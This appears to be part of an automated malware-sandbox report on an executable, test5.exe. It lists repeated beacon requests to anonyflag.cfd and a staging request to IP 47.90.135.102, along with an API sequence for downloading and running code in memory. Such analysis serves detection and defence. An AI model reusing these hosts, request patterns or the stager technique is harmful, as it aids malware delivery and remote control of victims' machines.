Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102
Source: unknown	TCP traffic detected without corresponding DNS query: 47.90.135.102

Source: C:\Users\user\Desktop\test5.exe

Code function: 0_2_0000021551B0015A HttpOpenRequestA,VirtualAlloc,InternetReadFile,

0_2_0000021551B0015A

Source: global traffic	HTTP traffic detected: GET /2Vcr HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)Host: 47.90.135.102Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
